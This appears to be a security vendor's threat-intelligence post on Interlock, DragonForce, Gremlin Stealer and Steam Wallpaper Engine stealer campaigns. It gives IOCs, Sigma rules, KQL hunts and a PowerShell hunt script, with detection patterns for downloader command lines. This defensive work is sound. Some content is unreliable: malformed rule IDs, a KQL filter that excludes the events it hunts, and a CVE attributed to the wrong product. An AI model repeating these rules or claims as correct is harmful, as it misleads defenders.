Back to Intelligence

Interlock & DragonForce Campaign: C2 Obfuscation via MSTeams and Stealer Delivery

SA
Security Arsenal Team
June 16, 2026
8 min read

Recent OTX Pulse data reveals a coordinated convergence of sophisticated credential theft and initial access tactics. Security Arsenal analysts have identified multiple active campaigns utilizing "living-off-the-land" (LotL) techniques to bypass traditional network defenses.

The primary threat landscape is dominated by Hive0163 (Interlock) and Rhysida actors preparing for ransomware operations via custom loaders like NodeSnake and InterlockRAT. Simultaneously, the DragonForce threat actor has been observed abusing legitimate Microsoft Teams relay infrastructure (CVE-2025-61155, CVE-2025-1055) to obscure Backdoor.Turn C2 traffic. In parallel, Gremlin Stealer variants are evolving with advanced VM-based packing, while the Steam Workshop ecosystem is being weaponized to deliver Vidar and Lumma stealers via malicious wallpapers.

The collective objective of these campaigns is credential harvesting, establishing persistent C2 channels, and financial extortion through ransomware or crypto-mining (observed in UAT-8616's Cisco SD-WAN exploitation).

Threat Actor / Malware Profile

Hive0163 / Interlock & Rhysida

  • Objective: Ransomware deployment and data exfiltration.
  • Malware: NodeSnake, InterlockRAT, JunkFiction (downloader), Supper, Broomstick (loader), Tomb (crypter).
  • Distribution: Trojanized installers and phishing campaigns.
  • Behavior: NodeSnake provides remote access; JunkFiction downloads subsequent payloads. The actors use Tomb to encrypt malicious binaries to evade static analysis.

DragonForce

  • Objective: Remote access and credential theft leading to ransomware.
  • Malware: Backdoor.Turn (Go-based RAT).
  • Distribution: Exploitation of vulnerabilities (CVE-2025-61155) and social engineering.
  • C2 Obfuscation: Leverages Microsoft Teams TURN relay servers. By using anonymous visitor tokens, traffic appears as legitimate *.teams.microsoft.com or relay.microsoft.com traffic, bypassing egress filtering.

Gremlin Stealer

  • Objective: Infostealing (payment cards, browser data, session tokens).
  • Malware: Gremlin Stealer (often bundled with Agent Tesla, Lokibot).
  • Technique: Uses commercial packing utilities with instruction virtualization. Payloads are hidden in embedded resource sections and executed via a custom private virtual machine (PVM).

Steam Wallpaper Engine Campaign

  • Objective: Gaming account hijacking and credential theft.
  • Malware: DarkComet, DarkKomet, Fynloski, Lumma, Vidar.
  • Distribution: Malicious projects uploaded to Steam Workshop. Users download "live wallpapers" that execute embedded scripts.
  • Behavior: The Wallpaper Engine executes the wallpaper script, which drops and executes the stealer payload.

IOC Analysis

The provided indicators represent a high-risk mix of network infrastructure and known malicious artifacts:

  • Domains/URLs: leadslaw.com (Interlock C2/related), Dropbox and Google Drive URLs used in Steam campaigns for payload delivery. SOC teams should block these domains and inspect DNS logs for historical resolutions.
  • File Hashes: A significant volume of SHA256, MD5, and SHA1 hashes are provided for payloads like Backdoor.Turn, Gremlin Stealer, and XenShell. These must be immediately imported into EDR detection rules and SIEM correlation engines.
  • CVEs:
    • CVE-2023-36036: Microsoft Exchange Server vulnerability.
    • CVE-2025-61155 / CVE-2025-1055: Vulnerabilities related to Microsoft Teams relay abuse.
    • CVE-2026-20128 / CVE-2026-20133: Cisco Catalyst SD-WAN vulnerabilities (Authentication Bypass).
  • IPs: 185.196.9.234 (Historical C2).

Operationalizing IOCs:

  1. Firewall/Proxy: Block all listed domains and IP ranges. Flag any egress traffic to relay.microsoft.com not originating from official Teams.exe processes.
  2. EDR: Query for the specific file hashes. Hunts should focus on processes spawned by Wallpaper32.exe (Steam) and unsigned Go binaries.

Detection Engineering

Sigma Rules

YAML
---
title: Potential Steam Wallpaper Engine Malicious Spawning
id: 3f8b5c2e-1a9b-4c3d-9e5f-6a7b8c9d0e1f
description: Detects suspicious processes spawned by Steam Wallpaper Engine, a known vector for Vidar and Lumma delivery.
status: experimental
date: 2026/06/17
author: Security Arsenal
references:
    - https://otx.alienvault.com/pulse/66545b2c1e0409586c19a2f9
tags:
    - attack.execution
    - attack.t1204
logsource:
    category: process_creation
    product: windows
detection:
    selection:
        ParentImage|endswith: '\wallpaper32.exe'
    filter_legit:
        Image|endswith:
            - '\wallpaper32.exe'
            - '\steamwebhelper.exe'
            - '\gameoverlayui.exe'
    condition: selection and not filter_legit
falsepositives:
    - Legitimate third-party wallpaper tools (rare)
level: high
---
title: DragonForce Backdoor.Turn Teams Relay Traffic
id: a1b2c3d4-5678-90ef-ghij-klmnopqrstuv
description: Detects potential Backdoor.Turn C2 traffic leveraging Microsoft Teams TURN servers by non-Microsoft processes.
status: experimental
date: 2026/06/17
author: Security Arsenal
references:
    - https://otx.alienvault.com/pulse/66545b2c1e0409586c19a2f9
tags:
    - attack.command_and_control
    - attack.t1071.001
logsource:
    category: network_connection
    product: windows
detection:
    selection_dst:
        DestinationHostname|contains:
            - 'relay.microsoft.com'
            - 'teams.microsoft.com'
    selection_port:
        DestinationPort: 443
    filter_legit:
        Image|contains:
            - '\Teams.exe'
            - '\Microsoft.Teams.exe'
            - '\msteams.exe'
    condition: selection_dst and selection_port and not filter_legit
falsepositives:
    - Other legitimate Office 365 apps communicating via custom endpoints
level: critical
---
title: Interlock Rhysida JunkFiction Downloader Activity
id: b2c3d4e5-6789-01fg-hijk-lmnopqrstuvw
description: Detects execution patterns associated with JunkFiction downloader or InterlockRAT installers.
status: experimental
date: 2026/06/17
author: Security Arsenal
references:
    - https://otx.alienvault.com/pulse/66545b2c1e0409586c19a2f9
tags:
    - attack.initial_access
    - attack.t1566.001
logsource:
    category: process_creation
    product: windows
detection:
    selection_img:
        Image|endswith:
            - '\msiexec.exe'
            - '\rundll32.exe'
            - '\regsvr32.exe'
    selection_cli:
        CommandLine|contains:
            - 'http://'
            - 'ftp://'
    selection_network:
        CommandLine|contains:
            - '/i'
            - 'javascript:'
    condition: all of selection_*
falsepositives:
    - Legitimate software installation
level: medium

KQL (Microsoft Sentinel)

KQL — Microsoft Sentinel / Defender
// Hunt for DragonForce Teams Relay abuse and Steam Wallpaper Malware
// Search for non-Microsoft processes contacting Teams infrastructure
DeviceNetworkEvents
| where Timestamp > ago(7d)
| where RemoteUrl has_any ("relay.microsoft.com", "teams.microsoft.com") 
| where InitiatingProcessName !has "Teams.exe" and InitiatingProcessName !has "msteams.exe"
| project Timestamp, DeviceName, InitiatingProcessAccountName, InitiatingProcessName, RemoteUrl, RemotePort

// Hunt for Steam Wallpaper Engine spawning suspicious payloads
DeviceProcessEvents
| where Timestamp > ago(30d)
| where InitiatingProcessFileName == "wallpaper32.exe"
| where not(ActionType in ("Process creation", "Process created")) // Adjust based on schema specifics
| project Timestamp, DeviceName, FileName, FolderPath, SHA256, InitiatingProcessFileName

// Hunt for specific IOCs (File Hashes)
DeviceFileEvents
| where Timestamp > ago(7d)
| where SHA256 in (
    "333903c7d22a27098e45fc64b77a264aa220605cfbd3e329c200d7e4b42c881c",
    "8a4033425d36cd99fe23e6faef9764fbf555f362ebdb5b72379342fbbe4c5531",
    "1bd0a200528c82c6488b4f48dd6dbc818d48782a2e25ccd22781c5718c3f62f5",
    "fc586cad94e5a10dd5be6a6ae6096bd02dfbfd094365bec87e788ed0798d6f67"
)
| project Timestamp, DeviceName, FileName, FolderPath, SHA256

PowerShell Hunt Script

PowerShell
# IOC Hunter for Interlock, DragonForce, and Steam Malware Campaigns
# Checks for the presence of specific file hashes and suspicious processes.

$TargetHashes = @(
    "333903c7d22a27098e45fc64b77a264aa220605cfbd3e329c200d7e4b42c881c", # InterlockRAT
    "1bd0a200528c82c6488b4f48dd6dbc818d48782a2e25ccd22781c5718c3f62f5", # Gremlin Stealer
    "8a4033425d36cd99fe23e6faef9764fbf555f362ebdb5b72379342fbbe4c5531", # Backdoor.Turn
    "fc586cad94e5a10dd5be6a6ae6096bd02dfbfd094365bec87e788ed0798d6f67"  # Steam Malware
)

$SuspiciousProcesses = @("wallpaper32.exe") # Parent process for Steam malware

Write-Host "[*] Starting Scan for IOCs..." -ForegroundColor Cyan

# 1. Scan fixed drives for file hashes
Write-Host "[*] Scanning file system for known malicious hashes..." -ForegroundColor Yellow
Get-ChildItem -Path C:\ -Recurse -ErrorAction SilentlyContinue | 
    Where-Object { !$_.PSIsContainer -and $_.Length -gt 0kb } | 
    ForEach-Object {
        $file = $_
        $hash = (Get-FileHash -Path $file.FullName -Algorithm SHA256 -ErrorAction SilentlyContinue).Hash
        if ($TargetHashes -contains $hash) {
            Write-Host "[!] MALICIOUS FILE FOUND: $($file.FullName) | Hash: $hash" -ForegroundColor Red
        }
    }

# 2. Check for active processes related to Steam Wallpaper Engine acting as parents
Write-Host "[*] Checking for suspicious process chains..." -ForegroundColor Yellow
$processes = Get-WmiObject Win32_Process | Where-Object { $SuspiciousProcesses -contains $_.Name }
if ($processes) {
    foreach ($proc in $processes) {
        Write-Host "[!] Suspicious Parent Process Found: $($proc.Name) (PID: $($proc.ProcessId))" -ForegroundColor Yellow
        Get-WmiObject Win32_Process | Where-Object { $_.ParentProcessId -eq $proc.ProcessId } | 
            ForEach-Object { 
                Write-Host "    -> Child Process: $($_.Name) (PID: $($_.ProcessId)) Command: $($_.CommandLine)" -ForegroundColor Red
            }
    }
} else {
    Write-Host "[+] No suspicious Wallpaper Engine processes detected." -ForegroundColor Green
}

# 3. Network Connection Check (DragonForce Teams Relay)
Write-Host "[*] Checking for connections to Teams Relay infrastructure..." -ForegroundColor Yellow
$connections = Get-NetTCPConnection | Where-Object { 
    $_.RemoteAddress -ne "0.0.0.0" -and 
    $_.State -eq "Established"
}

if ($connections) {
    foreach ($conn in $connections) {
        try {
            $proc = Get-Process -Id $conn.OwningProcess -ErrorAction Stop
            # Resolve hostname to check if it is Microsoft related
            # Note: DNS resolution can be slow; this is a basic check
            if ($proc.ProcessName -notmatch "Teams|msteams|outlook") {
                 # Deep packet inspection not available in PS, but we check if the process is unexpected for a standard corporate environment usually talking to MS infrastructure
                 if ($conn.RemotePort -eq 443) {
                    Write-Host "[!] Potential C2: Process $($proc.ProcessName) connected to $($conn.RemoteAddress):$($conn.RemotePort)" -ForegroundColor DarkYellow
                 }
            }
        } catch {
            # Ignore access errors
        }
    }
}

Response Priorities

Immediate (0-4 hours):

  • Blocking: Block all IOCs (IPs, Domains, URLs) at the perimeter firewall and proxy servers.
  • Hunting: Run the provided PowerShell script on endpoints to identify dropped payloads.
  • Network Isolation: Isolate any systems identified as communicating with 185.196.9.234 or resolving leadslaw.com.

Within 24 Hours:

  • Identity Verification: If credential-stealing malware (Lumma, Vidar, Gremlin) is suspected, force a password reset and enable MFA for all accounts accessed from compromised endpoints.
  • Steam Workshop Policy: Issue an immediate advisory to ban or restrict the use of "Steam Wallpaper Engine" and third-party workshops on corporate assets.
  • Vulnerability Scanning: Scan for Cisco Catalyst SD-WAN vulnerabilities (CVE-2026-20128) and Microsoft Teams relay flaws (CVE-2025-61155).

Within 1 Week:**

  • Architecture Hardening: Implement strict egress filtering to block non-browser applications from reaching *.teams.microsoft.com relay IPs.
  • Application Control: Configure AppLocker to prevent wallpaper32.exe from spawning child processes like powershell.exe or cmd.exe.
  • Patch Management: Apply patches for Cisco SD-WAN and Microsoft Exchange Server vulnerabilities referenced in the pulses.

Related Resources

Security Arsenal Incident Response Managed SOC & MDR Services AlertMonitor Threat Detection From The Dark Side Intel Hub

darkwebotx-pulsedarkweb-credentialscredential-theftinterlock-ransomwaredragonforcegremlin-stealerc2-obfuscation

Is your security operations ready?

Get a free SOC assessment or see how AlertMonitor cuts through alert noise with automated triage.

Book a SOC AssessmentSee AlertMonitor in Action